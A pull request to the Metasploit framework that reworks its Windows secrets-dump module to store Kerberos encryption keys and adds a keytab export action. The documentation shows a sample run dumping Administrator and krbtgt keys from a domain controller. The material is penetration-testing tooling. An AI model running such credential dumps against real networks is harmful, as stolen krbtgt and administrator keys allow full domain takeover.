### PR TITLE
Update windows_secrets_dump and Keytab module to export kerberos keys

### DIFF
--- a/documentation/modules/auxiliary/admin/kerberos/keytab.md
+++ b/documentation/modules/auxiliary/admin/kerberos/keytab.md
@@ -15,6 +15,7 @@ The following actions are supported:
 
 1. **LIST** - List the entries in the keytab file [Default]
 2. **ADD** - Add a new entry to the keytab file
+3. **EXPORT** - Export known Kerberos encryption keys from the database
 
 ## Scenarios
 
@@ -52,6 +53,49 @@ msf6 auxiliary(admin/kerberos/ktutil) > run action=ADD keytab_file=./example.key
 [*] modifying existing keytab
 [*] Generating key with salt: DEMO.LOCALAdministrator. The SALT option can be set manually
 [+] keytab entry added to ./example.keytab
+```
+
+### Export
+
+Export Kerberos encryption keys stored in the Metasploit database to a keytab file. This functionality is useful in conjunction with secrets dump
+
+```
+# Secrets dump
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
+... ommitted ...
+# Kerberos keys:
+Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
+Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
+Administrator:des-cbc-md5:ad49d9d92f5da170
+Administrator:des-cbc-crc:ad49d9d92f5da170
+krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
+krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
+krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
+... ommitted ...
+[*] Auxiliary module execution completed
+
+# Export to keytab
+msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab
+msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab
+[+] keytab saved to ./example.keytab
+Keytab entries
+==============
+
+ kvno  type              principal                                   hash                                                              date
+ ----  ----              ---------                                   ----                                                              ----
+ 1     1  (DES_CBC_CRC)  WIN11-DC3$@adf3.local                       3e5d83fe4594f261                                                  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       ADF3\DC3$@adf3.local                        967ccd1ffb9bff7900464b6ea383ee5b                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  ADF3\DC3$@adf3.local                        62336164643537303830373630643133                                  1970-01-01 01:00:00 +0100
+ 1     18 (AES256)       Administrator@adf3.local                    56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       Administrator@adf3.local                    df990c21c4e8ea502efbbca3aae435ea                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
+ 1     1  (DES_CBC_CRC)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
+ 1     18 (AES256)       krbtgt@adf3.local                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
+ 1     17 (AES128)       krbtgt@adf3.local                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
+ 1     3  (DES_CBC_MD5)  krbtgt@adf3.local                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
+... ommitted ...
+[*] Auxiliary module execution completed
 ```
 
 ### Common Mistakes

--- a/lib/msf/ui/console/command_dispatcher/creds.rb
+++ b/lib/msf/ui/console/command_dispatcher/creds.rb
@@ -33,7 +33,7 @@ class Creds
   end
 
   def allowed_cred_types
-    %w(password ntlm hash) + Metasploit::Credential::NonreplayableHash::VALID_JTR_FORMATS
+    %w(password ntlm hash KrbEncKey) + Metasploit::Credential::NonreplayableHash::VALID_JTR_FORMATS
   end
 
   #
@@ -396,13 +396,15 @@ class Creds
     # If we get here, we're searching.  Delete implies search
 
     if ptype
-      type = case ptype
+      type = case ptype.downcase
              when 'password'
                Metasploit::Credential::Password
              when 'hash'
                Metasploit::Credential::PasswordHash
              when 'ntlm'
                Metasploit::Credential::NTLMHash
+             when 'KrbEncKey'.downcase
+               Metasploit::Credential::KrbEncKey
              when *Metasploit::Credential::NonreplayableHash::VALID_JTR_FORMATS
                opts[:jtr_format] = ptype
                Metasploit::Credential::NonreplayableHash

--- a/lib/msf/util/windows_crypto_helpers.rb
+++ b/lib/msf/util/windows_crypto_helpers.rb
@@ -391,14 +391,14 @@ module WindowsCryptoHelpers
 
       plaintext = ciphertext
     end
-    rnd_seed.unpack('H*')[0]
+    rnd_seed
   end
 
   # Encrypt using MIT Kerberos aes128-cts-hmac-sha1-96
   # http://web.mit.edu/kerberos/krb5-latest/doc/admin/enctypes.html?highlight=des#enctype-compatibility
   #
   # @param raw_secret [String] The data to encrypt
-  # @param key [String] The salt used by the encryption algorithm
+  # @param salt [String] The salt used by the encryption algorithm
   # @return [String, nil] The encrypted data
   def aes128_cts_hmac_sha1_96(raw_secret, salt)
     aes_cts_hmac_sha1_96('128-CBC', raw_secret, salt)
@@ -408,12 +408,21 @@ module WindowsCryptoHelpers
   # http://web.mit.edu/kerberos/krb5-latest/doc/admin/enctypes.html?highlight=des#enctype-compatibility
   #
   # @param raw_secret [String] The data to encrypt
-  # @param key [String] The salt used by the encryption algorithm
+  # @param salt [String] The salt used by the encryption algorithm
   # @return [String, nil] The encrypted data
   def aes256_cts_hmac_sha1_96(raw_secret, salt)
     aes_cts_hmac_sha1_96('256-CBC', raw_secret, salt)
   end
 
+  # Encrypt using MIT Kerberos rc4_hmac
+  # http://web.mit.edu/kerberos/krb5-latest/doc/admin/enctypes.html?highlight=des#enctype-compatibility
+  #
+  # @param raw_secret [String] The data to encrypt
+  # @param salt [String] The salt used by the encryption algorithm
+  # @return [String, nil] The encrypted data
+  def rc4_hmac(raw_secret, salt = nil)
+    Rex::Proto::Kerberos::Crypto::Rc4Hmac.new.string_to_key(raw_secret, salt)
+  end
 end
 end
 end

--- a/lib/rex/proto/kerberos/crypto.rb
+++ b/lib/rex/proto/kerberos/crypto.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+# frozen_string_literal: true
 
 require 'rex/proto/kerberos/crypto/rc4_hmac'
 require 'rex/proto/kerberos/crypto/rsa_md5'
@@ -68,6 +69,18 @@ module Rex
           AES128 = 17
           AES256 = 18
           RC4_HMAC = 23
+
+          # Mapping of encryption type numbers to the human readable text description by IANA
+          # https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml
+          IANA_NAMES = {
+            DES_CBC_CRC => 'des-cbc-crc',
+            DES_CBC_MD4 => 'des-cbc-md4',
+            DES_CBC_MD5 => 'des-cbc-md5',
+            DES3_CBC_SHA1 => 'des3-cbc-sha1-kd',
+            AES128 => 'aes128-cts-hmac-sha1-96',
+            AES256 => 'aes256-cts-hmac-sha1-96',
+            RC4_HMAC => 'rc4-hmac'
+          }
 
           # The default etypes to offer to the Kerberos server when none is provided
           DefaultOfferedEtypes = [AES256, AES128, RC4_HMAC, DES_CBC_MD5, DES3_CBC_SHA1]

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -13,6 +13,20 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Util::WindowsRegistry
   include Msf::Util::WindowsCryptoHelpers
 
+  # Mapping of MS-SAMR encryption keys to IANA Kerberos Parameter values
+  #
+  # @see RubySMB::Dcerpc::Samr::KERBEROS_TYPE
+  # @see Rex::Proto::Kerberos::Crypto::Encryption
+  # rubocop:disable Layout/HashAlignment
+  SAMR_KERBEROS_TYPE_TO_IANA = {
+    1          => Rex::Proto::Kerberos::Crypto::Encryption::DES_CBC_CRC,
+    3          => Rex::Proto::Kerberos::Crypto::Encryption::DES_CBC_MD5,
+    17         => Rex::Proto::Kerberos::Crypto::Encryption::AES128,
+    18         => Rex::Proto::Kerberos::Crypto::Encryption::AES256,
+    0xffffff74 => Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
+  }.freeze
+  # rubocop:enable Layout/HashAlignment
+
   def initialize(info = {})
     super(
       update_info(
@@ -176,7 +190,9 @@ class MetasploitModule < Msf::Auxiliary
     retrieve_hive('SECURITY')
   end
 
-  def report_creds(user, hash, type: :ntlm_hash, jtr_format: '', realm_key: nil, realm_value: nil)
+  def report_creds(
+    user, hash, type: :ntlm_hash, jtr_format: '', realm_key: nil, realm_value: nil
+  )
     service_data = {
       address: rhost,
       port: rport,
@@ -378,7 +394,7 @@ class MetasploitModule < Msf::Auxiliary
         bind: false
       )
     rescue RubySMB::Dcerpc::Error::WinregError => e
-      vprint_warning("An error occured when getting the default domain name: #{e}")
+      vprint_warning("An error occurred when getting the default domain name: #{e}")
       domain = ''
     end
     username = "#{domain.encode(::Encoding::UTF_8)}\\#{username}" unless domain.nil? || domain.empty?
@@ -394,6 +410,7 @@ class MetasploitModule < Msf::Auxiliary
     "#{domain.upcase}host#{host.downcase}.#{domain.downcase}".b
   end
 
+  # @return [Array[Hash{String => String}]]
   def get_machine_kerberos_keys(raw_secret, _machine_name)
     vprint_status('Calculating machine account Kerberos keys')
     # Attempt to create Kerberos keys from machine account (if possible)
@@ -401,14 +418,29 @@ class MetasploitModule < Msf::Auxiliary
     salt = get_machine_kerberos_salt
     if salt.empty?
       vprint_error('Unable to get the salt')
-      return ''
+      return []
     end
 
-    raw_secret = raw_secret.dup.force_encoding(::Encoding::UTF_16LE).encode(::Encoding::UTF_8, invalid: :replace).b
+    raw_secret_utf_16le = raw_secret.dup.force_encoding(::Encoding::UTF_16LE)
+    raw_secret_utf8 = raw_secret_utf_16le.encode(::Encoding::UTF_8, invalid: :replace).b
 
-    secret << "aes256-cts-hmac-sha1-96:#{aes256_cts_hmac_sha1_96(raw_secret, salt)}"
-    secret << "aes128-cts-hmac-sha1-96:#{aes128_cts_hmac_sha1_96(raw_secret, salt)}"
-    secret << "des-cbc-md5:#{des_cbc_md5(raw_secret, salt)}"
+    secret << {
+      enctype: Rex::Proto::Kerberos::Crypto::Encryption::AES256,
+      key: aes256_cts_hmac_sha1_96(raw_secret_utf8, salt),
+      salt: salt
+    }
+
+    secret << {
+      enctype: Rex::Proto::Kerberos::Crypto::Encryption::AES128,
+      key: aes128_cts_hmac_sha1_96(raw_secret_utf8, salt),
+      salt: salt
+    }
+
+    secret << {
+      enctype: Rex::Proto::Kerberos::Crypto::Encryption::DES_CBC_MD5,
+      key: des_cbc_md5(raw_secret_utf8, salt),
+      salt: salt
+    }
 
     secret
   end
@@ -457,13 +489,13 @@ class MetasploitModule < Msf::Auxiliary
       secret = "dpapi_machinekey: 0x#{machine_key.unpack('H*')[0]}\ndpapi_userkey: 0x#{user_key.unpack('H*')[0]}"
     elsif upper_name.start_with?('$MACHINE.ACC')
       md4 = OpenSSL::Digest::MD4.digest(secret_item)
-      machine, domain = get_machine_name_and_domain
+      machine, domain, dns_domain_name = get_machine_name_and_domain_info
       print_name = "#{domain}\\#{machine}$"
       ntlm_hash = "#{Net::NTLM.lm_hash('').unpack('H*')[0]}:#{md4.unpack('H*')[0]}"
       secret_ary = ["#{print_name}:#{ntlm_hash}:::"]
       credential_opts = {
         realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-        realm_value: domain
+        realm_value: dns_domain_name
       }
       unless report_creds(print_name, ntlm_hash, **credential_opts)
         vprint_bad("Error when reporting #{print_name} NTLM hash")
@@ -476,20 +508,20 @@ class MetasploitModule < Msf::Auxiliary
       end
       secret = "#{print_name}:plain_password_hex:#{raw_passwd}\n"
 
-      extra_secret = get_machine_kerberos_keys(secret_item, print_name)
-      if extra_secret.empty?
+      machine_kerberos_keys = get_machine_kerberos_keys(secret_item, print_name)
+      if machine_kerberos_keys.empty?
         vprint_status('Could not calculate machine account Kerberos keys')
       else
-        credential_opts[:type] = :nonreplayable_hash
-        extra_secret.each do |sec|
-          unless report_creds(print_name, sec, **credential_opts)
-            vprint_bad("Error when reporting #{print_name} machine kerberos key #{sec}")
+        credential_opts[:type] = :krb_enc_key
+        machine_kerberos_keys.each do |key|
+          key_data = Metasploit::Credential::KrbEncKey.build_data(**key)
+          unless report_creds(print_name, key_data, **credential_opts)
+            vprint_bad("Error when reporting #{print_name} machine kerberos key #{krb_enc_key_to_s(key)}")
           end
-          sec.prepend("#{print_name}:")
         end
       end
 
-      secret << extra_secret.concat(secret_ary).join("\n")
+      secret << machine_kerberos_keys.map { |key| "#{print_name}:#{krb_enc_key_to_s(key)}" }.concat(secret_ary).join("\n")
     end
 
     if secret.empty?
@@ -510,8 +542,8 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  def get_machine_name_and_domain
-    if simple.client&.default_name == ''
+  def get_machine_name_and_domain_info
+    if simple.client&.default_name.blank?
       begin
         vprint_status('Getting Server Info')
         wkssvc = @tree.open_file(filename: 'wkssvc', write: true, read: true)
@@ -525,9 +557,9 @@ class MetasploitModule < Msf::Auxiliary
         print_error("Error when connecting to 'wkssvc' interface ([#{e.class}] #{e}).")
         return
       end
-      return [info[:wki100_computername].encode('utf-8'), info[:wki100_langroup].encode('utf-8')]
+      return [info[:wki100_computername].encode('utf-8'), info[:wki100_langroup].encode('utf-8'), datastore['SMBDomain']]
     end
-    [simple.client.default_name, simple.client.default_domain]
+    [simple.client.default_name, simple.client.default_domain, simple.client.dns_domain_name]
   end
 
   def connect_samr(domain_name)
@@ -614,7 +646,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def decrypt_supplemental_info(dcerpc_client, result, attribute_value)
-    result[:kerberos_keys] = {}
+    result[:kerberos_keys] = []
     result[:clear_text_passwords] = {}
     plain_text = dcerpc_client.decrypt_attribute_value(attribute_value)
     user_properties = RubySMB::Dcerpc::Samr::UserProperties.read(plain_text)
@@ -626,12 +658,12 @@ class MetasploitModule < Msf::Auxiliary
         kerb_stored_credential_new = RubySMB::Dcerpc::Samr::KerbStoredCredentialNew.read(binary_value)
         key_values = kerb_stored_credential_new.get_key_values
         kerb_stored_credential_new.credentials.each_with_index do |credential, i|
-          kerberos_type = RubySMB::Dcerpc::Samr::KERBEROS_TYPE[credential.key_type]
-          if kerberos_type
-            result[:kerberos_keys][kerberos_type] = key_values[i].unpack('H*')[0]
-          else
-            result[:kerberos_keys]["0x#{credential.key_type.to_i.to_s(16)}"] = key_values[i].unpack('H*')[0]
-          end
+          # Extract the kerberos keys, note that the enctype here is a RubySMB::Dcerpc::Samr::KERBEROS_TYPE
+          # not the IANA Kerberos value, which is required for database persistence
+          result[:kerberos_keys] << {
+            enctype: credential.key_type.to_i,
+            key: key_values[i]
+          }
         end
       when 'Primary:CLEARTEXT'
         # [MS-SAMR] 3.1.1.8.11.5 Primary:CLEARTEXT Property
@@ -691,7 +723,7 @@ class MetasploitModule < Msf::Auxiliary
         encrypted_nt_hash = dcerpc_client.decrypt_attribute_value(attribute_value)
         result[:nt_hash] = dcerpc_client.remove_des_layer(encrypted_nt_hash, rid)
       when lookup_table['userPrincipalName']
-        result[:domain_name] = attribute_value.force_encoding('utf-16le').split('@'.encode('utf-16le')).last
+        result[:domain_name] = attribute_value.force_encoding('utf-16le').split('@'.encode('utf-16le')).last.encode('utf-8')
       when lookup_table['sAMAccountName']
         result[:username] = attribute_value.force_encoding('utf-16le').encode('utf-8')
       when lookup_table['objectSid']
@@ -739,7 +771,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def dump_ntds_hashes
-    _machine_name, domain_name = get_machine_name_and_domain
+    _machine_name, domain_name, dns_domain_name = get_machine_name_and_domain_info
     return unless domain_name
 
     print_status('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
@@ -788,19 +820,19 @@ class MetasploitModule < Msf::Auxiliary
 
     credential_opts = {
       realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-      realm_value: domain_name
+      realm_value: dns_domain_name
     }
 
     print_line('# SID\'s:')
     user_info.each do |sid, info|
-      full_name = "#{domain_name}\\#{info[:username]}"
+      full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
       print_line("#{full_name}: #{sid}")
     end
 
     print_line("\n# NTLM hashes:")
     user_info.each do |_sid, info|
       hash = "#{info[:lm_hash].unpack('H*')[0]}:#{info[:nt_hash].unpack('H*')[0]}"
-      full_name = "#{domain_name}\\#{info[:username]}"
+      full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
       unless report_creds(full_name, hash, **credential_opts)
         vprint_bad("Error when reporting #{full_name} hash")
       end
@@ -810,7 +842,7 @@ class MetasploitModule < Msf::Auxiliary
     print_line("\n# Full pwdump format:")
     user_info.each do |sid, info|
       hash = "#{info[:lm_hash].unpack('H*')[0]}:#{info[:nt_hash].unpack('H*')[0]}"
-      full_name = "#{domain_name}\\#{info[:username]}"
+      full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
       pwdump = "#{full_name}:#{info[:rid]}:#{hash}:"
       extra_info = "Disabled=#{info[:disabled].nil? ? 'N/A' : info[:disabled]},"
       extra_info << "Expired=#{!info[:disabled] && info[:expires] && info[:expires] > Time.at(0) && info[:expires] < Time.now},"
@@ -851,7 +883,7 @@ class MetasploitModule < Msf::Auxiliary
       )
     end
     user_info.each do |_sid, info|
-      full_name = "#{domain_name}\\#{info[:username]}"
+      full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
 
       if info[:nt_history].size > 1 || info[:lm_history].size > 1
         info[:nt_history][1..].zip(info[:lm_history][1..]).reverse.each_with_index do |history, i|
@@ -871,18 +903,25 @@ class MetasploitModule < Msf::Auxiliary
 
     print_line("\n# Kerberos keys:")
     user_info.each do |_sid, info|
-      full_name = "#{domain_name}\\#{info[:username]}"
+      full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
 
       if info[:kerberos_keys].nil? || info[:kerberos_keys].empty?
         vprint_line("No Kerberos keys for #{full_name}")
       else
-        credential_opts[:type] = :nonreplayable_hash
-        info[:kerberos_keys].each do |key_type, key_value|
-          key = "#{key_type}:#{key_value}"
-          unless report_creds(full_name, key, **credential_opts)
-            vprint_bad("Error when reporting #{full_name} kerberos key #{key}")
+        credential_opts[:type] = :krb_enc_key
+        info[:kerberos_keys].each do |key|
+          krb_enckey = {
+            **key,
+            # Map the SAMR kerberos key to an IANA compatible enctype before persisting
+            enctype: SAMR_KERBEROS_TYPE_TO_IANA[key[:enctype]]
+          }
+
+          krb_enckey_to_s = krb_enc_key_to_s(krb_enckey)
+          key_data = Metasploit::Credential::KrbEncKey.build_data(**krb_enckey)
+          unless report_creds(full_name, key_data, **credential_opts)
+            vprint_bad("Error when reporting #{full_name} kerberos key #{krb_enckey_to_s}")
           end
-          print_line "#{full_name}:#{key}"
+          print_line "#{full_name}:#{krb_enckey_to_s}"
         end
       end
     end
@@ -907,7 +946,7 @@ class MetasploitModule < Msf::Auxiliary
     @samr.close_handle(@domain_handle) if @domain_handle
     @samr.close_handle(@builtin_domain_handle) if @builtin_domain_handle
     @samr.close_handle(@server_handle) if @server_handle
-    @samr.close
+    @samr.close if @samr
     if dcerpc_client
       dcerpc_client.drs_unbind(ph_drs)
       dcerpc_client.close
@@ -1104,5 +1143,13 @@ class MetasploitModule < Msf::Auxiliary
     @tree.disconnect! if @tree
     simple.client.disconnect! if simple&.client.is_a?(RubySMB::Client)
     disconnect
+  end
+
+  private
+
+  # @param [Hash] data The keyberos enc key, containing enctype, key and salt
+  def krb_enc_key_to_s(data)
+    enctype_name = Rex::Proto::Kerberos::Crypto::Encryption::IANA_NAMES[data[:enctype]] || "0x#{data[:enctype].to_i.to_s(16)}"
+    "#{enctype_name}:#{data[:key].unpack1('H*')}"
   end
 end

--- a/spec/modules/auxiliary/admin/kerberos/keytab_spec.rb
+++ b/spec/modules/auxiliary/admin/kerberos/keytab_spec.rb
@@ -67,7 +67,7 @@ RSpec.describe 'kerberos keytab' do
 
           subject.list_keytab_entries
           expect(@output.join("\n")).to match_table <<~TABLE
-          keytab entry added to #{keytab_file.path}
+          keytab saved to #{keytab_file.path}
           Keytab entries
           ==============
 
@@ -89,7 +89,7 @@ RSpec.describe 'kerberos keytab' do
 
           subject.list_keytab_entries
           expect(@output.join("\n")).to match_table <<~TABLE
-          keytab entry added to #{keytab_file.path}
+          keytab saved to #{keytab_file.path}
           Keytab entries
           ==============
 
@@ -116,7 +116,7 @@ RSpec.describe 'kerberos keytab' do
 
           subject.list_keytab_entries
           expect(@output.join("\n")).to match_table <<~TABLE
-          keytab entry added to #{keytab_file.path}
+          keytab saved to #{keytab_file.path}
           Keytab entries
           ==============
 
@@ -145,7 +145,7 @@ RSpec.describe 'kerberos keytab' do
 
           subject.list_keytab_entries
           expect(@output.join("\n")).to match_table <<~TABLE
-            keytab entry added to #{keytab_file.path}
+            keytab saved to #{keytab_file.path}
             Keytab entries
             ==============
 


### PR DESCRIPTION
Alternative to the previous PR https://github.com/rapid7/metasploit-framework/pull/17236 - this PR has reduced scope

Requires https://github.com/rapid7/metasploit-credential/pull/168

Adds support for:
- Updating secrets dump module to save real KrbEncKeys which can later be used for encrypting/decrypting Kerberos tickets
- Adds export functionality to the `modules/auxiliary/admin/kerberos/keytab.rb` module, which is useful for decrypting wireshark traffic, as well as integrating with other tools

## Verification

- Verify the windows secrets dump module works
- Verify the keytab export module works, and wireshark traffic can be decrypted